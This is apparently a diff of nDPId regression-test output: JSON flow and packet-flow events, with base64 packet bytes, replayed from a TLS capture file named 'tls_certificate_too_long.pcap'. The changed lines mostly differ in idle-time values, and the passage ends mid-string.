-02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1626168078673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC1Absg2aa\/F4bv+FAQEACuIgAAFwMDCRUAAAAAAAAAWfKHBs70qmO4BAxw\/KH76VJthsd+JmhEdw9LbrjkTjI9b3XfM0DMNLKHxmQFc1wZ9+v47IezDEajRVIeCS0iuwLsGsA3YBgKp65J4M20GnYw3QEoWxPt99213+KI1CclXQzaueofFw\/qIILvmneWSh5sBJstqbtZLD2cDfq2tFoUseLZtuSKYL5M6qSNwvarEAmysHZgT7Udi\/a0Qp07Np4WgFkq\/a9MQH22ift7VaKutQa0mJmP19SdWXTILAVbvhO3J6cdL9EqjePIeIkXKca0uVG2cDnC+ogcIBgWiBVq1pQlzG6pgHKD3PRA0vNoda3MJ0atx621R\/WKvfMZJYbQztqn6MP4oCdEaJloUS59wJjijiLCZEHV1oirlnS2nC0LRIMkV0xOr2eStcvbZVXw4nOKDQS6H4Zgv11KltQC1JnlZF3H2hfUzks7VZJ1piCl7JLEyNiXPboWZlWGmZoEaDAEUa\/zJI4IEULQtYV9J4jBVG0LIyT8dLpi5cgu5HSsaKdQTef+rQO01UnLW77pUjM2FuWnb+vOmbNg9vroOAp08oUd4WURirzl+3HYtCcfBI3wOCJwEWivMjawTzc9kqNg6MLXXDVodJ+9u6ySbjGo8wdF8Ujzicfc0DHPbSwSWwzi48Lx1Xv3zlCdNcfYFQi2USvaYTxC82pbJFTcLcjA75y5d4uDzJFLRDQQPcLYiW1zyuRecgn4v\/HoR\/nQn8q3KO2aunXtZjN2Sgwqa9bCj+P70uuLOr7LdCSf95Yuvv83BVkjI8LO\/K2GelZusfiw+ph2AM5v3nVCVFtVClMHt5LBbn90AGigLyLssV8usgvMte9WY2YO5RbaLrRuaQaZXq7xKP6I9rbLNl04xmGTkSwgMCnsYgpwvWgoxVEJKIK81LOzdRyjEIzviQKsdu5zYpaTUYn0gMWLbk8gisL6HsaNyyzZRZny4WG9c8rHaQ0AVF7OZHAfugm1G0Ya+4uTEO06lH0Y0luTPeZbk6BzWyTQN4kkdYJgzbQ\/H4fL96wAxDKYsoN4xb\/dNiL+rBxozbwW3E3YDpgsLBHEYXx\/9T+ZZByNcVhoanUoyeZR4La0nznczRNl0BSSAwop3ffF\/3weBpuyebCHd3nQY06YIOyKfw5o\/8+DIvbWrrftOtndpCOAfM8xK0ncs0qGgNDeHWSGhfqOCu4xsd1D6TNFpi+SoFxZbO162qCP1uQZqSIk3sB4T700Vag3Fmr5zAc2+Cy2sdC\/A9S2zr73WQ2tNqbvUTsm7mAOCy6fHXiJfrCMOm070Q3x\/hDA1F\/ri24teJTcz681Tpyzz98or8aBXhC1tirmfRKLeb1za5S0A5FpvCOErLaYZ7JnA2Hcnep7W9VvnkzVZD\/eh5PJxQTtMHNN3t73y3SocpYzsv4jecsMhINyJMQzKIZyFN7BeOFn3Icd72v79IVYW+OEMLTFGr\/z0a3l6KHAUNHg5OrTZy63kxeuj2oqpuTuGGW5OGR1vga0lB9LeT5DNs1fw4ET+3+xHSDQYEpIQCm73rmKpEzHnGvP6PaZFc3upw\/YvkfAML3GBWjg6BeNxYGhLgBq1U7bw1AAqe3KjEtHWznkCRp0j2b1yA1x473SNIk\/Tl0OU2uF4V2zDlzbygL3UGekyceZ9TOivgWvNEFgm3JDyB1JsgPkE1UA9Mb3RcUv6IS4oUKckZLMvYCqsp6JNk+hSM2SSYrjCpjVhAAYR\/Tw9J3qPbVuQ\/+0boJNNW9SXU3FXb1mu6\/UjowIaOU5yd1Ruw2HgKAG+TcnMQdTBDCV1Fn1s2Gos7GgJFmic+wrwQmUwvry3qcM4QfQn+KkqL+DVzAfZpY3UE5kKkQw09tvvvCnUub+fKLuuHs2xshp8SgWsVHUpe\/eGalaURu9E5+S5ef5NZPTZU4="} -01667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1626168078673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":936,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":936,"pkt_l4_len":902,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgOaAABAAEAGncbAqAF5NGKjEtC1Absg2axnF4bv+FAYEAByKgAA8hiRnjTuMaDQEL+CLYj0enfAkHVnXO7nV5IzKiak6sLS6qxgDE4htK9g2bjk3R484+O\/m3LR4RiopAnWolcjfbrpfWVb1lMjRimj35IfoR0InDQcTV+lqM1hnbaRsbPul7kk7yp40mdnMbGeSdokyNlVd+Gc2o9y\/kRGCp\/RqZF8PhlnvFvIilO8yiVaTaBmaNQ2c5Ph9+sPKU5aFL1uQpdr\/lZqIfEq2kVgCrdBeDo4qNeeQzKtJNsLVSSXJNaa5EbU9xA4Gcwa59FEb+z5l5k6kMngz8ZNuAlqyaHzifpWW3O+gJvTHlQKGmobQMi8ii1K+B8azR0rME7gHuYp8j9KIa090V1eZVPAqukxBBhYGnGZkUnr+FDlf1ZK\/6jjt\/FM8rQ\/lbeUUBqVgsa+O\/WxUto3U7xUvYDA5nlmX+JiSIl7TX4qI+Ru0aN0Akmto\/YQCR\/ts7jv1DeYAK5L5Yy2Vh6PLRQ4c+Pa\/92Jj4DNdt3iyKVflpKtt14Zke3huw2c2HHz1srDVPgqGpJqA\/eD7864eDOp49Ft0Yeo1yo62XnCO2MSq34SmUewekOqz3llMeY3SFHNG\/SCIEenKOH+ZLswKCtHaL23XWktzPIAvtiPaUe8OQwJHr\/lbrWuPFkD\/U0II2V8NaPz4AVb17oDlmuZOeHOf8JZ5gjU14hPhQ0t944FAWUouPhqgHpug4J7fVHUyJ1W0HeNumJ7723SardKLRg5P7i3J2r6\/9HqflhjXWWoqO31j\/pyOLWOUftD3uTRP8P11Cr3jlNVHTXBld4hude0v33CDpTR\/mf09FhR1Yz1vcA7zHJhk+Hem4vzglb2dTx3BT6MRYPvgUON2zk99ErenQrEGfd6PyJWO5iWwsY0xU8meKY2Jp0LdAk9BxGhy3LU4uTxR4t614VXg7Le3F2XXuKmjbJsQgbVMUYhVkJ6JBcddg15aCLR+YYoWrYgjp+WThS8gLNpJaxaihLqA77pNdcaI187nN+luEpN2fsVBRr1v588oPOg6ugZIMvvQGM\/932ci9FWgh+Egtrp9jWvgwN6C+x\/6Ul9gPKwr35MQ2L88mYUnXuuDGVnTkJ6VTWgAawJ1AxcwiThWo3unPbjvr6pM+jswTV6XOO7V8+41tsMKM1s8WPQI+YtWq8fuv3wgnLtmndqFCNp"} -00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7440000,"flow_min_l4_payload_len":1448,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1448,"flow_avg_l4_payload_len":1448,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1626168078673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC0AbvnBlzSyo5yyVAQEADxegAAFwMDCRUAAAAAAAAA26eDpJKN0BUxQmpzIi5g3ucuMMDrMgecHX\/CXiINnB6nf8RfrEh6QYh8SapIE51Wk64JXAUrOVrpUS79nUGqzqypD0Bb3GpnKslW+hVNJEAhzXjXlIms0Mdvn6rZf1ZDryhGsMaJdsIsDeqTE7cSjb\/AwDHg30Dyx\/033m2orYnQp+ZJ5N9NWzfNjr1H+vEJ2aGglmYbAeu\/eTtxNNfcP8qqdaUykL6lGIGhgLgYGMo5CMVqPKpBBKbvbUNBzJadRi9LHo18AgSCwBMZ6bHVYJDpuFL7e4MT+bXzL18TYFQOTCQfRi5j7DT1as0nLD6cQ0jKomb4NNz1M1ClcV55CitfGm0nMZU3GHOq9xlAFFOdfaUNUR+\/9UjqZ44ylRWAqJ6YHxWCQdtqMTvizXKZS4+o82xV4TJVbLkhSRuiz2uTEwwVxekQB2DDmh3GiR9Ye6GPUgczN\/oCVDwpIkKENeQcP\/6Pokh8HMAvZ2RSwo+VUg00wRguVh\/w3achjv22jf5I9GRZwEow5WUpfCf8lVnHG9wLFCzsLG1I8WMaT0TDTKmn7QoYLtSk2V04tAybQOMHVVI0hNhlfUXhSh+SCshPM17AY0UkKtRYcOa2eStGarsU2t5cfO840a2F+oCsIGDj3tvdR13INFmb7pHkKy+Q2V+4uyAMl+Ox8g+B18vuMUBFtZgxt4DO0uuOzFmplvXLtxD3fbrKuxl\/6k\/eCJsGdMUgzkQC\/tUwe4V3D4jZHwwQSFFI+17aKc3J7x1BEo6ekzNTJS1+B4LNLTfv+T0lK8gzRlr5u7\/zaM8tfLPPN37K2o1mRMRjA5iIukpvT8U5wOf5x\/TVVVdMA8FAaqdY6hLNRSvAFVtu5XaBHOcfP3sb1XSB1z4GRcUCgiJxv+lQFekTDU9BS5oGQCQcC+WphKRrfjCRy8ZZhWK9J\/fFGeUgxNdNGEWCyhtCDvzCtVbUxSi2WZ66rDdU3aSKcEOMnDfpPuQ3aNkoqkdkwbdMewaWAPifWpjrrxg90ieLTE7FgbcxFjvhr5lFLSoRBF\/iPJs6lHTLDkWB5y15f1r\/8ZLDb4IhW9FIX\/CLiZ6rpS0mHTHUE9vn\/9hAsmx46xOm3J34VvMgqFYNluvzn3dUGnNnv4rW9ETLU5nx9MjAInMLEQZjDDkNtlaMy4FrKcYLZYQdYzERpfoBvKuaTJfKsWfO7jgAn1v6gbrSWphH3cXzQjxw802J0V4QeazmBVGA0E6lG79pCNEO0uh2dgwktSmtwiCBclBc5tjf6nl4O1l4nqizShQRxCCIPprqlc5ewvpot0KzGllydHXYVwvl3NqOGVnDVbcYW6rsr9cNQcgn1WFKVBGaaHM+XgnvZNhqKSKSS\/JwnHZ96JaxzHCfl4G5C2cceJe1cA34Dat1FKEtweJ9xvHyrHpcm5q9Vkp7cv2o7Ygb+hipT+4C1cSkXBVesDC0+tvSXpCsG73FkouarVtpL+0PQKkzAR1yJgDVrUYv9JCem0QTLOVmTHZ+lN3HGmtyIJYoBu1J4ll241iHn4yj6vQ701Nb8mVXZ6EpF\/5V+Ojw4OShpQ9K4JNfmRah1H4u1+tm5sdLnJXJCnxd1z1bP35y0tiPSMOaFD7D36ftgNesfeblmbdO3QvYo5sZjH2g\/rkgDvWctEdVPFefeneKNa6YJtDm2B1tmPiPBA9Oq0w39UHoupp7PhIxW8KMg8k6pOGMjzQ6Lk23qZ2phXBaaIaaOL394fc7c7DxLl8DqdGBlLveqkkwCREFnxvKjAePN1cC1XOtq0lnaYt1kQ27UguJ0fER9DAfYowgtFCNAKFVeNA3gSi1AQ+OtFaANU7+ThFzU9jKVufQm+9414vvr6INHdHhMJCKTXzk4z8zZd0u+NZ05MVhtrOOr5TlUY0TGx+kJE8="} -01656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1626168078673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":936,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":936,"pkt_l4_len":902,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgOaAABAAEAGncbAqAF5NGKjEtC0AbvnBmJ6yo5yyVAYEADQ3AAA8smVcb3q7jInDMp6iu2tmr5Z01S6ktfb24g2DVivJvFFx18svOuqK0sgnY23ZGcWDPabxfRHCA4+gQkog41eD9Q+jY8o9PdPxSEJPwKKiq97+swgykYZPYYGmASILHqMJuZfByhEv3xViLnOQSEMlZhcFWZRFTusxMYced9WKWA0fc6Tz6HTt2Slu4vTvwt52pLlywDQ+moDsDqD4uzlqRKVGfUL\/ch1qgzh1ik3fV6dkbtg2JStfj9+0gWhw\/1tpp41Yq3ViTYYlVWsBAlK9383UtTU6832bkiivRikzvg6xlr6cUoD8pfbv255mX4wGzTGlmpvD4zQbPqZWm+dyGHA4KTjyuOM3iUOXvN2EIc4hSFWRtZSWhTg95jPk2WAmsedaTcdmQKZ2viJIrwprKiA8pqElIbad4UayJEEQ2rLEHe+6Rkn7weFiJ9Cf4UMQ6av+K70+Y96itdD4PDv0OKsC6tZfU\/tfc4I3DNLWON4dS6I+6zur216gRLFptPxg8nJaKRiptY9M7sohpWI5akHqMg98N8hf2hc0wH9zfT\/L5fz7Z9CQdyywynd2mPmUEW9OWFeYn4wEC\/gdxA80M9Zzf7uv0KAn+8LelSJkvdI3pBiv4FC333GGWS6fic1Zy4pYfk+L8GFZinANnaiXdJr7xAtMQ1GYOBWAHKoH+GJ8tU2xACRvM36EvIAH0I2RrIzXjHRnEOXkSC+CLSu8xyz6ePYQHWJqTeOV24udwyFiAkzDPh7H2SHxmU7LHZwkam8rX9zgmZLxdYHlhAD2yJRjuwO6msg2yZjsqwSwxdSZJhRunBsHb4p7DEvQLMPjpsbatjtgVN9T+qsCyHCJEkFmMU3QsxkCGtossZlWOQrLODqkaHoKbAV0ZeWnv1dwukSAWvNXFgALrC\/LDs9Yk\/0HHogbwj5gGNEDtJS+nkfi7bA8yoN5eCDO2Vffn4zk+ciDVKaCLhgHHzVMIfIKVrI1fMzRQLNYRDWjxKcqdipYwYp0PAI+b3Yx\/DzTVijfHkaedZRCvCw9VPw+QLgF0VkIyTaHhWJgvUO1Zj1YHqbkkNGKFdwVWPQGrGrq1LqA0g1BITMzZ35AcyWNuoGr66LZrtpjF+wDWVoz964kvXYU00tfXiJSAYozGe62YqD95apGcA76\/XZl5+SMB+fuqPf"} -02440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1626168078674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078674,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC1Absg2a\/ZF4bv+FAQEAAXNQAAFwMDDxEAAAAAAAAAWp5GeZKPSB7w816DdrEEqHX9aC+YviuGDPWPZX1hWzeJO56tAdFAhHB2CxgaqBUmTp67G7NpRBSOlgFCk7Rz2PSU2RjHkzQN9DEZnqJDnpBJTPsDp7SajTr4PwFG5UIWqi9zReh9EtkjrIng35h3QjPy5pgRGIggIUa\/zHocLpnIHnx2NID0uKUJhEdZqWE4pcslJgdX4YfRKdEPTj3+9rZ3sLr++gXqMzrFGQr9EQgG6\/tRgaivaU0aW0ztmvO3\/qkvcrzeXMhBZCC0bJVz2bEiKKLd+7L5\/eHqmfs1xGLoIVjqoCMrClOzLnCDeSqZPqsY8tiTWubYavu9O8jG+ez+5Hkdw5Zqb5fD9oP0Ibcl2RZkNVM95HmLc4YD76gl\/z1R4Pv\/X+\/YqfzUCuKlbPSA2rgZ1AV5JLooIc7Be\/pYYpsCuIChG0LSB3wA5uDyqmIr57tSP8OI\/758hiFPERZ62qSkcVdehrui9bd5qubE0mTze86LYcawTdiQmMEKmQRBM4+o\/tLRLdTTAHx+8vIwh6AzvixYQvN8Ez8hb+phV92bD5q6hI7M8\/JGEZPjzNU+xKD+ISfZsgEkV2kgA1pedlTeMVuH\/BZclBXFLL5qRfhqeOdjAoZ73FOd8rYWzIde9ssd7E5A+tydX+O9p3kJTnLjhtup7pO1JKqLG8qs7kj4hnoO0t81p9EOSvl36UbBJ\/\/ta9Ym0CAwPBXdG+wAoJE7kndX2G2xUen+Ixk8fIsE2mGGvoV1Us4DqJZlvb5kJ5nWps2iI9sPEuDCreKTajgn6cDATXaCOavuKfFgCBU7JO2xOSJglSq7B7a6Rdhau\/3b0GgchjkVWsL6KTcuabDbsB3hgBi88ZjqfwCY2Nb9XY\/bt2EvOKRb8ymRF+9JboUUDmnm0q\/gX\/KH1nOauqAmFBE3aLfeWKAmW\/ItfqIuivKY+YDdWjc0HTcG1YGSfVrjr6aDU6y2TemMpnTIWRCWpvy7K5WBLe5V6MFlmxWmTIqOmq2cAefJgEppNDtGK3uWqgpEtHWR7rX\/TY7ljVAdLTNKRs1CNLO9YQxubR3nk57cLpnXbrfj+v+Lj4KuWOQnGZWe\/F\/8TM6cKx8vWkZgNLvg7fWbclvvuNbfQRKs6H63c6ZScHSu30WlwdJca10PuaOw6kUS8+8NgGoTM6EEL\/iGpUGKZDRPOSrSaO1EzIgUat4tPz1jNP77yXzl++\/KXlg43EyAlQZOnRr\/NFgfM4gzLfr7lDMDA3E0lRT+v95g78gwDuwXQ7BBPnvAls+NQwZbP7V0m0BvQjEB6p0fzqeSFPDpYbzQ0ZX6GjzMOnlKuf61RRwzVqCy8gfKQUs3skC1gvLgCV41uMUPTEfGnxmlKSMMVedbAmX+sTsKmnVgrA25Xxx44Rnz4aF\/zFkDRBzvExZFLH6OXGMRXTSfsHLF31OKw0QjcHdXKZOHlLQlo\/rph7r52bcX5wKB3t7XosUhaCCO8kIb3nCkluBB+sXwJFoKumEHcqAVe9Z4M3C6DXD1eVQo5daa5wFvH9M6HZwbTveh7JVbvVN9W+ACJJ82iXxyheKmXUZCNDVrtQaESdZ59LGHrlE2HGCg9gGl6VFzZLygZFAEjriuVbNilai2NxLiYx9gUajnBWGV8FEvryyeJFk\/CE6DTkT5\/Kza\/2Cu73O0Rb9icER0MPyduoWRXyUIUkVQogDMSeWnU3q93wChqd9rGdeB4XXoIzzAE+R\/SRKrrCLHUwPWEq20rYRcseqENqusBQFpiEpsgV0CsZ5TY3+f7Z7A3Y\/FdWIGrpWpaXY666wWyBIvkxWFWygO7Vx3zPMA3tnlzCspk3L3LaW0mn2EnnX30PeY5vR3upafUEAXSo6G6QdKCFC0FARyFx\/T+JPasg5u4ToWCOaORH2gHwo="} -02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1626168078674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1292,"pkt_l4_len":1258,"thread_ts_msec":1626168078674,"pkt":"WNVuaKQA8BiYFWV8CABFAgT+AABAAEAGnGLAqAF5NGKjEtC0AbvnBmXsyo5yyVAYEACH9AAAFwMDBNEAAAAAAAAA3P9mE\/WxzRlzhJVvrME7arSt4cc4b80\/fLZ45lg2jTLN+h8OznVOp0v0YJHlvGb6zo1R0y0127nCMLhWICtDPy2FtY028GLgaBdr\/YLaP88jpPC2wcimHwfty2x4WKI+LPeYoEPRAYicmmTAxPlFzZuaf1iKs+Yu1pMdI4311+rTrqclcjjttiygU+MPtoh4rbcQQi4hllQZ9bpYWoVqJ+iSt2BigYH05vsyHmu879GAhVkohrBF89b4NLKyNAMo0\/QxqgG1rqZTGisx7FjNs8y8uxtw5iKWrSpnhwqsK8HdkzdODGF90yeLdn3CCNJgdm3aNHt1MWZ4JOUy5GzAb47y2cy051il96yYxnPjPoqHZ+sb8GqydD+Wdtw8hwTtkDW7xa7mACJTwuWOIU79l2oDnl63ylL8+JOFMkvCyqpvRSJQTp84k5efBKX3KzQjur4Xu79lO0LFF2NRDD6HkdNIzdZ6GrjQ6cfeKSx84X\/NzyeoBGfExOO\/4zYWpKYV5emN2qK2WwFz9V6yUT4FYCEpMENn4zKRUt2gX3+QJ3UggRDfQ8Atlul6XoqofW\/JfCf+PszhgtXLpc9QxVs3UVfeC+BCBsI\/evJsy+X2zvUBACJp1Cao7EAa\/un53A8cu1w+QQ\/3\/qpgFcwuebDk+bTd2XwEmQcRY5ntXb11cm+t6EgiuWMc8LtkZLW4g6Qk7C3exETENqr8qaKtA57iz69EbEaWfUTp590Cm1yhdVWnzQVccpyZRGULka\/D5PTiR6o3UCqpNAg8I43q9sRPGdaOzmk6LqC8kGMMj1N8P2DVYvcwJb3HB14BO5Blfb4kQNaSZCX81P5eekubMcrCkaYeLnnSigA4c2KBCJI0\/apWCuj0F93qKZChgzKT77EQe9PNeEwH9qa2yEnfxe42M9M\/dR+ZqezhwWXFtPpr0H\/z1rdkNoyBVAssfrasWrQx8flrDgnBIYD1460XCzVYLXxrhZgLoJb3EnAJ7vXCxsY0pXppBEZDDdim91oHmoHdPCYl0He7JYRSbPjtQSoUoTzcJp7PxKyOdGVLYBgNJz7zY+ZgHgZgGwjl0V0nqegEjC35a9y8SnKE63ljmDCyN8pWus5ViXGLvQ2Q\/1YgRAjjfufkIFVVjlXa01yHVzB76HDZ1tJk9CCm9ap34gzfAiHToNIXmogCeGqn2CdKyBeaiMSGkpYWcPn2x5217jPoRlFNQrlxxA+bM2VQvFdzsWSjAthvEYT8M0NKxSkvF5fH3eNJZYaUGLIiBrgIGbm4pAM\/x0xPOGKmtUmoLltnDzmkCbUcHYiWy3Y7nJHL865N2SK80a9Zp+7VINzLRf\/Ervx7NR7ytI7hPsERS2gR+t5ngZO4VMBVWlnWrW+Q0k4Q1KqCHh7RRwRxv5sH62zb+RmG6I1XbjkIiH\/fDv5F+LoUplAhBWHtQdc4gcY6R330O9wWahGV3oVm2bRxt8RZJJruLD1DYhwwT99J89GgAfYqHkYbcpYCi6LHqYqrQ6UmOTNERlSpwcXx4Ujj\/ftQuU3MAdSrHpDwvlJG8V3434OyaQQ78dblNHDOqOcIm3UL5vFVeeu11Ar10lwqpNk+NFgn+2DriZe1BIfTkQZAL4Pitnn2QjlLKFQ="} +00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7560000,"flow_min_l4_payload_len":1448,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1448,"flow_avg_l4_payload_len":1448,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1626168078673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC1Absg2aa\/F4bv+FAQEACuIgAAFwMDCRUAAAAAAAAAWfKHBs70qmO4BAxw\/KH76VJthsd+JmhEdw9LbrjkTjI9b3XfM0DMNLKHxmQFc1wZ9+v47IezDEajRVIeCS0iuwLsGsA3YBgKp65J4M20GnYw3QEoWxPt99213+KI1CclXQzaueofFw\/qIILvmneWSh5sBJstqbtZLD2cDfq2tFoUseLZtuSKYL5M6qSNwvarEAmysHZgT7Udi\/a0Qp07Np4WgFkq\/a9MQH22ift7VaKutQa0mJmP19SdWXTILAVbvhO3J6cdL9EqjePIeIkXKca0uVG2cDnC+ogcIBgWiBVq1pQlzG6pgHKD3PRA0vNoda3MJ0atx621R\/WKvfMZJYbQztqn6MP4oCdEaJloUS59wJjijiLCZEHV1oirlnS2nC0LRIMkV0xOr2eStcvbZVXw4nOKDQS6H4Zgv11KltQC1JnlZF3H2hfUzks7VZJ1piCl7JLEyNiXPboWZlWGmZoEaDAEUa\/zJI4IEULQtYV9J4jBVG0LIyT8dLpi5cgu5HSsaKdQTef+rQO01UnLW77pUjM2FuWnb+vOmbNg9vroOAp08oUd4WURirzl+3HYtCcfBI3wOCJwEWivMjawTzc9kqNg6MLXXDVodJ+9u6ySbjGo8wdF8Ujzicfc0DHPbSwSWwzi48Lx1Xv3zlCdNcfYFQi2USvaYTxC82pbJFTcLcjA75y5d4uDzJFLRDQQPcLYiW1zyuRecgn4v\/HoR\/nQn8q3KO2aunXtZjN2Sgwqa9bCj+P70uuLOr7LdCSf95Yuvv83BVkjI8LO\/K2GelZusfiw+ph2AM5v3nVCVFtVClMHt5LBbn90AGigLyLssV8usgvMte9WY2YO5RbaLrRuaQaZXq7xKP6I9rbLNl04xmGTkSwgMCnsYgpwvWgoxVEJKIK81LOzdRyjEIzviQKsdu5zYpaTUYn0gMWLbk8gisL6HsaNyyzZRZny4WG9c8rHaQ0AVF7OZHAfugm1G0Ya+4uTEO06lH0Y0luTPeZbk6BzWyTQN4kkdYJgzbQ\/H4fL96wAxDKYsoN4xb\/dNiL+rBxozbwW3E3YDpgsLBHEYXx\/9T+ZZByNcVhoanUoyeZR4La0nznczRNl0BSSAwop3ffF\/3weBpuyebCHd3nQY06YIOyKfw5o\/8+DIvbWrrftOtndpCOAfM8xK0ncs0qGgNDeHWSGhfqOCu4xsd1D6TNFpi+SoFxZbO162qCP1uQZqSIk3sB4T700Vag3Fmr5zAc2+Cy2sdC\/A9S2zr73WQ2tNqbvUTsm7mAOCy6fHXiJfrCMOm070Q3x\/hDA1F\/ri24teJTcz681Tpyzz98or8aBXhC1tirmfRKLeb1za5S0A5FpvCOErLaYZ7JnA2Hcnep7W9VvnkzVZD\/eh5PJxQTtMHNN3t73y3SocpYzsv4jecsMhINyJMQzKIZyFN7BeOFn3Icd72v79IVYW+OEMLTFGr\/z0a3l6KHAUNHg5OrTZy63kxeuj2oqpuTuGGW5OGR1vga0lB9LeT5DNs1fw4ET+3+xHSDQYEpIQCm73rmKpEzHnGvP6PaZFc3upw\/YvkfAML3GBWjg6BeNxYGhLgBq1U7bw1AAqe3KjEtHWznkCRp0j2b1yA1x473SNIk\/Tl0OU2uF4V2zDlzbygL3UGekyceZ9TOivgWvNEFgm3JDyB1JsgPkE1UA9Mb3RcUv6IS4oUKckZLMvYCqsp6JNk+hSM2SSYrjCpjVhAAYR\/Tw9J3qPbVuQ\/+0boJNNW9SXU3FXb1mu6\/UjowIaOU5yd1Ruw2HgKAG+TcnMQdTBDCV1Fn1s2Gos7GgJFmic+wrwQmUwvry3qcM4QfQn+KkqL+DVzAfZpY3UE5kKkQw09tvvvCnUub+fKLuuHs2xshp8SgWsVHUpe\/eGalaURu9E5+S5ef5NZPTZU4="} +01667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1626168078673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":936,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":936,"pkt_l4_len":902,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgOaAABAAEAGncbAqAF5NGKjEtC1Absg2axnF4bv+FAYEAByKgAA8hiRnjTuMaDQEL+CLYj0enfAkHVnXO7nV5IzKiak6sLS6qxgDE4htK9g2bjk3R484+O\/m3LR4RiopAnWolcjfbrpfWVb1lMjRimj35IfoR0InDQcTV+lqM1hnbaRsbPul7kk7yp40mdnMbGeSdokyNlVd+Gc2o9y\/kRGCp\/RqZF8PhlnvFvIilO8yiVaTaBmaNQ2c5Ph9+sPKU5aFL1uQpdr\/lZqIfEq2kVgCrdBeDo4qNeeQzKtJNsLVSSXJNaa5EbU9xA4Gcwa59FEb+z5l5k6kMngz8ZNuAlqyaHzifpWW3O+gJvTHlQKGmobQMi8ii1K+B8azR0rME7gHuYp8j9KIa090V1eZVPAqukxBBhYGnGZkUnr+FDlf1ZK\/6jjt\/FM8rQ\/lbeUUBqVgsa+O\/WxUto3U7xUvYDA5nlmX+JiSIl7TX4qI+Ru0aN0Akmto\/YQCR\/ts7jv1DeYAK5L5Yy2Vh6PLRQ4c+Pa\/92Jj4DNdt3iyKVflpKtt14Zke3huw2c2HHz1srDVPgqGpJqA\/eD7864eDOp49Ft0Yeo1yo62XnCO2MSq34SmUewekOqz3llMeY3SFHNG\/SCIEenKOH+ZLswKCtHaL23XWktzPIAvtiPaUe8OQwJHr\/lbrWuPFkD\/U0II2V8NaPz4AVb17oDlmuZOeHOf8JZ5gjU14hPhQ0t944FAWUouPhqgHpug4J7fVHUyJ1W0HeNumJ7723SardKLRg5P7i3J2r6\/9HqflhjXWWoqO31j